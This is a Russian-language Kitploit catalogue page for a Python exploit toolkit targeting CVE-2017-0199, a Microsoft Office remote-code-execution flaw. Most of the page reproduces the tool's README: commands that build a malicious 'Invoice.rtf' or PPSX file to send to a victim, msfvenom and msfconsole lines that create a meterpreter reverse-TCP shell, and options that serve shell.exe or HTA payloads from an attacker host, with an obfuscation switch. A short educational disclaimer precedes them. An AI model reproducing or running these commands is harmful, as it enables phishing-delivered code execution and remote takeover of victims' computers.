Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2017-0199 — Набор инструментов на Python для эксплуатации CVE-2017-0199 (удаленное выполнение кода в Microsoft Office), который генерирует вредоносные RTF/PPSX-файлы и доставляет полезные нагрузки Metasploit или пользовательские полезные нагрузки жертвам. | Kitploit
Инструменты/GitHubGitHub/phantomlancer123/cve-2017-0199
Генерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming
GitHubphantomlancer123/cve-2017-0199

CVE-2017-0199

Набор инструментов на Python для эксплуатации CVE-2017-0199 (удаленное выполнение кода в Microsoft Office), который генерирует вредоносные RTF/PPSX-файлы и доставляет полезные нагрузки Metasploit или пользовательские полезные нагрузки жертвам.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
18 лет назадЕщё не проверено

Exploit toolkit CVE-2017-0199 - v4.0

Exploit toolkit CVE-2017-0199 - v4.0 — это удобный скрипт на python, который предоставляет пентестерам и исследователям безопасности быстрый и эффективный способ тестирования Microsoft Office RCE. Он может создать вредоносный файл RTF/PPSX и доставить полезную нагрузку metasploit / meterpreter / другую без какой-либо сложной настройки.

Отказ от ответственности

Эта программа предназначена ТОЛЬКО для образовательных целей. Не используйте её без разрешения. Обычные оговорки применяются, особенно тот факт, что я (bhdresh) не несу ответственности за любой ущерб, причинённый прямым или косвенным использованием информации или функциональности, предоставленной этими программами. Автор или любой интернет-провайдер НЕ несёт ответственности за содержание или неправомерное использование этих программ или любых их производных. Используя эту программу, вы принимаете тот факт, что любой ущерб (потеря данных, сбой системы, компрометация системы и т.д.), вызванный использованием этих программ, не является ответственностью bhdresh.

Наконец, это личная разработка, пожалуйста, уважайте её философию и не используйте её для плохих целей!

Лицензия

Лицензия CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/

Примечания к выпуску:

В скрипт добавлены следующие возможности:

root@kitploit:~
- Генерация вредоносного файла PPSX
- Режим эксплуатации для сгенерированного файла PPSX
- Обновлённый template.ppsx

Версия: Python версии 2.7.13

Сценарий 1: Доставка локальной полезной нагрузки

Примеры команд
root@kitploit:~
1) Создание вредоносного RTF-файла
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) (Опционально, если используется полезная нагрузка MSF): Создайте полезную нагрузку metasploit и запустите обработчик
   # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
   # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Запустите toolkit в режиме эксплуатации для доставки локальной полезной нагрузки
   # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
Диаграмма последовательности

alt tag

Сценарий 2: Доставка удаленной полезной нагрузки

Примеры команд
root@kitploit:~
1) Создание вредоносного RTF-файла
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) Запустите toolkit в режиме эксплуатации для доставки удаленной полезной нагрузки
   # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://remoteserver.com/shell.exe
Диаграмма последовательности

alt tag

Сценарий 3: Доставка пользовательского HTA-файла

Примеры команд
root@kitploit:~
1) Создание вредоносного RTF-файла
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
2) Запустите toolkit в режиме эксплуатации для доставки пользовательского HTA-файла
   # python cve-2017-0199_toolkit.py -M exp -t RTF -H /tmp/custom.hta
Диаграмма последовательности

alt tag

Аргументы командной строки:

root@kitploit:~
# python cve-2017-0199_toolkit.py -h

Это удобный набор инструментов для эксплуатации CVE-2017-0199 (Microsoft office RCE)

Режимы:

-M gen                                          Создать только вредоносный файл

     Создание вредоносного RTF/PPSX-файла:

      -w <Filename.rtf/Filename.ppsx>     Имя вредоносного RTF/PPSX-файла (Поделитесь этим файлом с жертвой).

      -u <http://attacker.com/test.hta>   Путь к HTA/SCT-файлу. Обычно это должен быть домен или IP-адрес, где работает                                              этот инструмент.
                                      Например, http://attackerip.com/test.doc (Этот URL будет включён в 	                                              вредоносный RTF/PPSX-файл и будет запрошен, когда жертва откроет вредоносный RTF-файл.
      -t RTF|PPSX (по умолчанию = RTF)         Тип создаваемого файла.
      -x 0|1  (по умолчанию = 0)               Создать обфусцированный RTF-файл. 0 = Отключено, 1 = Включено.

				      
-M exp                                          Запустить режим эксплуатации

     Эксплуатация:
 
      -t RTF|PPSX (по умолчанию = RTF)         Тип файла для эксплуатации.
      -H </tmp/custom>                Локальный путь к пользовательскому HTA/SCT-файлу, который необходимо доставить и выполнить на целевой системе.
                                          ПРИМЕЧАНИЕ: Этот параметр не будет доставлять полезные нагрузки, указанные через параметры "-e" и "-l"
					  
      -p <TCP port:Default 80>            Номер локального порта.

      -e <http://attacker.com/shell.exe>  Путь к исполняемому файлу / оболочке meterpreter / полезной нагрузке, которую необходимо выполнить на целевой системе.

      -l </tmp/shell.exe>                 Если полезная нагрузка размещена локально, укажите локальный путь к исполняемому файлу / оболочке meterpreter / полезной нагрузке.

Благодарности

@nixawk за образец RTF, @Li Haifei, @bhdresh

Ошибки, проблемы, запросы функций

Очевидно, я не разработчик на полную ставку, поэтому ожидайте некоторые сбои

Пожалуйста, сообщайте об ошибках и проблемах через https://github.com/bhdresh/CVE-2017-0199/issues/new

Скачать инструмент